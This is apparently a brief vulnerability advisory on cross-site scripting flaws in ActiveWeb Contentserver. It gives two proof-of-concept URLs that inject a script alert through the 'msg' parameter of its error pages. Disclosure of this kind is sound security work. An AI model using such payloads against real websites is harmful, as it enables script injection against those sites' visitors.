• info
• discussion
• exploit
• solution
• references

ActiveWeb Contentserver Multiple Cross-Site Scripting Vulnerabilities

Attackers may exploit these issues through a browser.

The following proofs of concept are available:

http://www.example.com/errors/rights.asp?awReadAccessRight=True&msg=<script>alert('XSS')</script>

http://www.example.com/errors/transaction.asp?msg=<script>alert('XSS')</script>